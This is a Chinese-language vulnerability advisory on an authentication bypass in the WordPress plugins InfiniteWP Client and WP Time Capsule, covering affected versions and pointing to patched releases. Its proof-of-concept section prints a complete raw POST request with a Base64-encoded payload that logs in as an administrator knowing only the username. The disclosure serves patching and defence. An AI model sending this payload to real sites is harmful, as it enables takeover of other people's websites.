WordPress插件InfiniteWP Client和WP Time Capsule漏洞风险通告

发布时间 2020-01-16

漏洞编号和级别


CVE编号:暂无,危险级别:严重,CVSS分值:厂商自评:9.8,官方未评定


影响版本


InfiniteWP Client < 1.9.4.5

WP Time Capsule < 1.21.16


漏洞概述


WordPress插件InfiniteWP Client和WP Time Capsule中的身份验证绕过漏洞使得32万个网站易受攻击。这两个插件用于帮助用户管理一台服务器上的多个WordPress网站,并在发布更新时为文件和数据库条目创建备份。


WebArx安全研究人员发现它们的代码中存在逻辑错误,使得攻击者可以绕过密码来登录管理员账户。根据WordPress插件库,InfiniteWP Client被安装在30多万个网站上;而WP Time Capsule的安装量至少为2万。


研究人员发现在低于版本1.9.4.5的InfiniteWP Client中,攻击者可以使用带有JSON和Base64编码的payload的POST请求来绕过密码,通过仅知道管理员用户名来登录。而在低于1.21.16的WP Time Capsule版本中,攻击者可通过在原始POST请求中添加恶意字符串来调用函数捕获可用的管理员账户列表并以第一个管理员身份登录。


漏洞验证


插件InfiniteWP Client的POC:https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/。


首先需要使用JSON编码的负载,然后是Base64。接下来,它将在POST请求中原始发送到目标站点。


POST / HTTP/1.1

Host: example.org

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

Content-Type: text/plain

Content-Length: 93


_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==


修复建议


目前这两个插件都已发布更新修复了该问题:


https://wordpress.org/plugins/iwp-client/

https://wordpress.org/plugins/wp-time-capsule/


参考链接


https://threatpost.com/wordpress-bug-leaves-sites-open-to-attack/151911/